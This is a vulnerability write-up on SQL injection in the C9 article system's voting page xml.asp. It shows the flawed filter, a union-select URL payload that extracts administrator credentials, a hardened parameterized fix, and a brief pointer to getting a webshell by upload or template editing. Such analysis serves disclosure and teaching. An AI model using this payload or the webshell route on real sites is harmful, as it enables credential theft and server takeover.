By: Jshell
Recently I have been studying ASP by reading source code downloaded from down.chinaz.com.
I had seen a program called the C9 static article publishing system before, but had not read it carefully.
Today I downloaded a copy and read it, and found a problem. The voting module includes a Flash voting feature.
I don't understand Flash, so I captured the traffic and read it. I found that the vote is submitted through add.asp, and that xml.asp
provides the RSS output. Reading that file, I found the problem.
The code is as follows:
<!--#include file="../conn.asp"-->
<!--#include file="../fun/funlogic.asp"-->
<%
thisid = funstr(Trim(Request.QueryString("voteid")))
If thisid = "" Then
    Set rs = conn.execute("select top 1 * from plug_vote where oorc<>false order by id desc")
Else
    Set rs = conn.execute("select * from plug_vote where id=" & thisid)
End If
If rs.eof Then response.Write("connection data error"): response.End()
conn.execute "update plug_vote set votevi=votevi+1 where id=" & rs("id")
For i = 1 To 5
    If IsNull(rs("cs_" & i)) Then Exit For
Next
nowid = rs("id")
......
%>
Let us look at how the value of the variable is received.
thisid = funstr(Trim(Request.QueryString("voteid"))): Trim strips the spaces on both sides, then funstr is applied. That function lives in the included file fun/funlogic.asp, so open that file:
Function funstr(str)
    str = Replace(str, "<", "&lt;", 1, -1, 1)
    str = Replace(str, ">", "&gt;", 1, -1, 1)
    str = Trim(str)
    str = Replace(str, "", "'")
    funstr = str
End Function

Function unfunstr(str)
    str = Replace(str, "&lt;", "<", 1, -1, 1)
    str = Replace(str, "&gt;", ">", 1, -1, 1)
    str = Trim(str)
    str = Replace(str, "'", "")
    unfunstr = str
End Function
This function filters a few characters out of a string, such as < > and surrounding spaces. The author may have believed this is enough to prevent injection. It is not: none of the filtered characters is needed for the injection, because voteid is used as a number and concatenated straight into the query.
http://127.0.0.1:2936/plug_vote/xml.asp?voteid=1
Construct http://127.0.0.1:2936/plug_vote/xml.asp?voteid=1%20and%201=2%20union%20select%20...,7,username,password,18%20from%20user%20where%20id=1 and the query returns the administrator username and password:
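A hardened version of the lookup in xml.asp, as an added example that is not part of the C9 source: voteid is accepted only as a plain positive integer and is bound as an ADODB parameter instead of being concatenated into the query. The conn object and the plug_vote table are taken from the page; everything else is assumed.

```vbscript
<%
' Added example (not C9's own code): strict input validation plus parameterized queries.
Dim rawId, voteId, re, cmd, rs
rawId = Trim(Request.QueryString("voteid"))

' funstr() only rewrites < > and quotes. A numeric payload such as
' "1 and 1=2 union select ..." contains none of those, so escaping is no defence.
' Accept the value only if it is a short string of digits; reject everything else.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If rawId <> "" Then
    If Not re.Test(rawId) Then
        Response.Write("invalid voteid")
        Response.End()
    End If
    voteId = CLng(rawId)
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn   ' conn is opened in ../conn.asp, as in the original

If rawId = "" Then
    cmd.CommandText = "select top 1 * from plug_vote where oorc<>false order by id desc"
Else
    ' The value is passed as a bound parameter, so it is never parsed as SQL.
    cmd.CommandText = "select * from plug_vote where id = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , voteId) ' 3 = adInteger, 1 = adParamInput
End If
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write("connection data error")
    Response.End()
End If

' The counter update uses the id read back from the database, again as a parameter.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "update plug_vote set votevi = votevi + 1 where id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(rs("id")))
cmd.Execute
%>
```

The same pattern applies to every other page in the application that builds SQL from request values; the filter in funlogic.asp should be treated as output encoding, not as an injection defence.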
Once in the backend, there are two ways to get a webshell: uploading and editing templates.
The template path can be edited. Not to mention MJJ, who fell victim to this vulnerability.